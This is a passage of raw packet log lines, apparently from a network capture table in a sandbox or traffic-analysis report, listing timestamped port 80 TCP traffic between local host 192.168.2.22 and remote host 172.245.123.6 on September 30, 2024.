                                                                                  Sep 30, 2024 10:12:31.879616976 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879627943 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879657984 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879666090 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879681110 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879698038 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879708052 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879703045 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879719019 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879726887 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879726887 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879733086 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879748106 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879754066 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879754066 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879769087 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879781961 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879822969 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879832983 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879853964 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879862070 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879865885 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879877090 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879883051 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879888058 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879893064 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879905939 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879934072 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879940033 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879956961 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879966974 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879978895 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.879987001 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879987001 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.879990101 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880000114 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880004883 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880028963 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880028963 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880028963 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880074978 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880088091 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880099058 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880121946 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880139112 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880157948 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880168915 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880179882 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880191088 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880199909 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880227089 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880227089 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880250931 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880260944 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880270958 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880281925 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880291939 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880292892 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880300999 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880306005 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880321026 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880336046 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880351067 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880362034 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880372047 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880390882 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880400896 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880404949 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880410910 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880422115 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880438089 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880444050 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880444050 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880449057 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880459070 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880460024 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880475044 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880492926 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880558014 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880568981 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880579948 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880590916 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880600929 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880604029 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880611897 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880625963 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880629063 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880629063 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880644083 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880659103 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880676985 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880686998 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880697012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880707026 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880716085 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880748034 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880748034 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880784035 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884437084 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884495974 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884515047 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884526968 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884548903 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884550095 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884558916 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884563923 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884569883 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884577036 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884581089 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884589911 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884592056 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884602070 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884603024 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884613037 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884619951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884624004 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884633064 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884646893 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884663105 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884790897 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884834051 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884840012 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884845972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884865046 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884882927 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885025978 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885042906 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885052919 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885062933 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885072947 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885072947 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885083914 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885086060 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885094881 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885101080 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885104895 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885114908 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885116100 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885126114 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885129929 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885137081 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885147095 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885160923 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885174036 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885198116 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970402002 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970417023 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970427036 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970438957 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970454931 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970465899 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970488071 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970499039 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970504045 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970509052 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970527887 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970534086 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970539093 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970544100 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970560074 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970570087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970582008 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970587015 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970592022 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970596075 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970596075 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970597029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970602036 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970612049 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970617056 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970629930 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970639944 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970644951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970644951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970645905 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970654964 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970664978 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970665932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970670938 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970688105 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970700026 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970700026 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970705986 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970710039 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970722914 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970722914 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970735073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970736980 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970748901 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970757961 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970760107 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970766068 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970773935 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970782042 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970783949 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970793009 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970807076 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970814943 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970990896 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971077919 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971090078 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971100092 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971110106 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971122026 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971126080 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971136093 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971138000 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971143007 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971148968 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971160889 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971163988 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971174955 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971182108 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971184969 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971190929 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971201897 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971203089 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971209049 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971211910 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971220970 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971223116 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971229076 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971237898 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971249104 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971249104 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971266031 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971266985 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971278906 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971287966 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971290112 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971298933 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971298933 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971309900 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971321106 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971322060 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971327066 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971332073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971342087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971350908 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971358061 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971362114 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971368074 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971371889 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971379042 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971394062 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971395016 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971407890 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971420050 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971421957 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971434116 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971436024 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971442938 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971446991 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971457005 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971467972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971467972 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971473932 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971479893 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971498966 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971510887 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971532106 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971539021 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971543074 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971574068 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971584082 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971585035 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971585035 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971594095 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971595049 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971601009 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971606970 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971618891 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971633911 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971640110 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971693039 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971718073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971729040 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971740007 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971751928 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971755981 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971761942 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971766949 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971772909 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971782923 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971782923 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971795082 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971796989 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971806049 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971808910 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971829891 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971838951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971863031 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971873045 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971873999 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971884012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971898079 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971904039 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971908092 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971919060 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.971923113 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.971942902 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.972008944 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972019911 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972035885 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972047091 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972050905 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.972057104 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.972059011 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972069025 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972079992 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972080946 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.972085953 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.972110033 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.972115040 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972126007 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972136021 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972146988 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.972153902 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.972163916 CEST4916780192.168.2.22172.245.123.6
